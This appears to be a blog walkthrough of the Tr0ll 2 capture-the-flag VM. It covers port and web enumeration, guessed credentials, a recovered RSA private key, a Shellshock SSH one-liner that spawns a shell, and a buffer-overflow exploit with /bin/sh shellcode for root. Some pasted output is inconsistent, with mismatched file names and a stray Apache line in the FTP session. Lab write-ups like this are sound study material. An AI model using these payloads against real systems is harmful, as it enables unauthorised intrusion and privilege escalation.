Arr0way
I rooted Tr0ll 1, so thought it would be rude not to try the second VM in the Tr0ll series… Tr0ll 2 requires a buffer overflow to perform local escalation, the first VM didn’t require any exploitation. However, like the first VM I’d say this is challenege is more a case of guessing credentials, trying things you think probably wont work.
Description
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)
Difficulty is beginner++ to intermediate.
##Enumeration
Enumeration process started.
nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6
root:~# nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-02 19:24 EST
Host is up (0.0026s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.8
Network Distance: 2 hops
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
</p>
###Service Enumeration
| Port | Service | Version Detection |
|---|---|---|
|
|
FTP |
vsftpd 2.0.8 or later |
|
|
SSH |
OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) |
|
|
HTTP |
Apache httpd 2.2.22 ((Ubuntu)) |
###SSH Enumeration
Zoning out watching my Nmap scan complete I noticed, the hostname was Tr0ll. I attempted to login via ssh with Tr0ll password: Tr0ll, it worked ! But I instantly got booted off, tried a few things nothing worked… So I tried FTP.
###FTP Enumeration
I tired the same credentials against ftp and discovered a file called “noob” in the ftp root.
ftp noob
root:~# ftp 172.31.31.6
Connected to 172.31.31.6
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (172.31.31.6:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get lmao.zip
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1474 bytes received in 0.02 secs (60.6 kB/s)
ftp> exit
221 Goodbye.
</p>
Attempting to extract lmao.zip failed, prompting for a noob password.
Onto the next service then…
###HTTP Enumeration
Web browser showed:
nmap --script=http-enum -p80 -n 172.31.31.6
root:~# nmap --script=http-enum -p80 -n 172.31.31.6
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-2 18:40 GMT
Nmap scan report for 172.31.31.6
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /robots.txt: Robots file
Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
</p>
Entering /robots.txt url in the browser rendered:
User-agent:*
Disallow:
/noob
/nope
/try_harder
/keep_trying
/isnt_this_annoying
/nothing_here
/404
/LOL_at_the_last_one
/trolling_is_fun
/zomg_is_this_it
/you_found_me
/I_know_this_sucks
/You_could_give_up
/dont_bother
/will_it_ever_end
/I_hope_you_scripted_this
/ok_this_is_it
/stop_whining
/why_are_you_still_looking
/just_quit
/seriously_stopThe slash was stripped off with some sed sed 's./..g' robots.txt dirb was then used to check the following urls.
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Sat Jan 3 08:08:15 2015
URL_BASE: http://172.31.31.6/
WORDLIST_FILES: robots.txt
-----------------
GENERATED WORDS: 21
---- Scanning URL: http://172.31.31.6/ ----
+ http://172.31.31.6//noob (CODE:301|SIZE:309)
+ http://172.31.31.6//keep_trying (CODE:301|SIZE:316)
+ http://172.31.31.6//dont_bother (CODE:301|SIZE:316)
+ http://172.31.31.6//ok_this_is_it (CODE:301|SIZE:318)
-----------------
DOWNLOADED: 21 - FOUND: 4They all rendered the same image (301’d).
Nothing exciting was in the page source:
What did you really think to find here? Try Hardercat_the_troll.jpg was downloaded from all the above locations from the target and examined.
ls -la showed a slightly different file size for one of the images, I began by running each of the files through cat (cating the cat? - sorry).
Look Deep within y0ur_self for the answerI tired this against the previously downloaded lmao.zip file, no luck. I tried y0ur_self as web path like on tr0ll:1
Success, the web dir contained a text file http://172.31.31.6/y0ur_self/answer.txt scrolling though from the browser it looked like the file was base64 encoded.
wget http://172.31.31.6/y0ur_self/answer.txt
root:~# wget http://172.31.31.6/y0ur_self/answer.txt
</p>
Decoding the file revealed it was massive, the following was used to decode and sort by line length:
base64 decoding
root:~# base64 -d answer.txt > answer-decoded.txt && awk '{print length, $0;}' answer-decoded.txt | sort -nr | less
30 ItCantReallyBeThisEasyRightLOL </p>
The top line looked promising, ItCantReallyBeThisEasyRightLOL I tried this against lmao.zip
unzip lmao.zip
root:~# unzip lmao.zip
Archive: lmao.zip[lmao.zip] noob password:
inflating: noob
</p>
Yes!
The contents of noob
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq
yDSPjrmPsyFePcpHmwWEdeR5AWIv/RmGZh0Q+Qh6vSPswix7//SnX/QHvh0CGhf1
/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD/fy11Th33KwmcsgnPo
q+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5
z+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy
e5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna
u+W3cSHrmgWi/Ge0Ht6tP193V8IzyD/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0
gvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq
UmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079
La35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec/j3Kvse2GrXJFhZ2IEDAfa0GXR
xgl4PyN8O0L+TgBNI/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP
aq/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW
K+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx
n48iIflln6u85KYEjQbHHkA3MdJBX2yYFp/w6pYtKfp15BDA8s4v9HMCgYEA0YcB
TEJvcW1XUT93ZsN+lOo/xlXDsf+9Njrci+G8l7jJEAFWptb/9ELc8phiZUHa2dIh
WBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv
ibsKq9kucenZOnT/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t
0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq
vKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh
ywLymdDOlq3TOZ+CySD4/wUCgYEAr/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG
th8mjrEwf/b/1yai2YEHn+QKUU5dCbOLOjr2We/Dcm6cue98IP4rHdjVlRS3oN9s
G9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye
q51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4/fC77+NO
vW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot/W3IiRlkobhO07p3nj601d+OgTjjgKG
zp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==
-----END RSA PRIVATE KEY-----SSH Shellshock
Attempting to login using the discovered key failed, with a messaging saying TRY HARDER LOL!.
I tried to feed it commands by tagging them on the end, the connection hung then dropped with no message.
I googled some shellshock options and managed to spawn a shell with:
ssh -i noob [email protected] '() { :;}; /bin/bash'
shellshock ssh
root:~# ssh -i noob [email protected] '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
</p>
##Local Enumeration
Transfered my local enumeration script to the target, disclosing the following odd sticky bit files:
#########################################
## Sticky Bit ##
#########################################
drwsr-xr-x 3 root root 4096 Dec 29 19:00 /nothing_to_see_here
drwsr-xr-x 5 root root 4096 Oct 4 22:36 /nothing_to_see_here/choose_wisely
drwsr-xr-x 2 root root 4096 Oct 5 21:19 /nothing_to_see_here/choose_wisely/door2
drwsr-xr-x 2 root root 4096 Oct 5 21:18 /nothing_to_see_here/choose_wisely/door3
drwsr-xr-x 2 root root 4096 Oct 4 22:19 /nothing_to_see_here/choose_wisely/door1Each of the door directories contained a file called r00t, du -sh * in the parent dir choose_wisely showed one of the files was larger - I started there.
od -S 1 r00t was used against each of the files, the larget file contained:
0017545 bof.c
0017553 __init_array_end
0017574 _DYNAMIC
0017605 __init_array_start
0017630 _GLOBAL_OFFSET_TABLE_
0017656 __libc_csu_fini
0017676 __i686.get_pc_thunk.bx
0017725 data_start
0017740 printf@@GLIBC_2.0
0017762 _edata
0017771 _fini
0017777 strcpy@@GLIBC_2.0
0020021 __DTOR_END__
0020036 __data_start
0020053 __gmon_start__
0020072 exit@@GLIBC_2.0
0020112 __dso_handle
0020127 _IO_stdin_used
0020146 __libc_start_main@@GLIBC_2.0
0020203 __libc_csu_initbof.c - pretty good indication that Buffer Overflow was the next logical step (unless it’s more tr0ling).
##Exploit Development
###Fuzzing
I started by fuzzing with 300 A’s:
fuzzing linux binary
root:~# ./r00t $(python -c 'print "A" *300')
Segmentation fault
</p>
Bangin’ then I tried 250 no crash, adding 10 each time then subtracting when the seg fault occoured at 268 and the instruction pointer address at 269 Illegal instruction.
Using gdb I located the address of ESP.
(gdb) i r esp
esp 0xbffffb80 0xbffffb80Padded with some NOPs - for a reliable landing.
Overwrote EIP with the location of ESP and tagged some shellcode on the end to exectute a shell.
###Final Exploit
./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')Note: gdb drops privileges on SUID, in order to spawn the new shell with SUID you need to execute the exploit outside of gdb, or the shell will spawn as the unprivileged user.
The binaries in choose_wisely/door* are rotated, the largest is the vulnerable binary.
Exploit Process
root:~#
du -sh *
12K door1
12K door2
16K door3
root:~#
cd door3
root:~#
./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" *
10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\
xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
root:~#
whoami
root
root:~#
cat /root/Proof.txt
You win this time young Jedi...
a70354f0258dcc00292c72aab3c8b1e4
##Root dance
##Thanks
Thanks to @maleus21 for creating this VM challenege.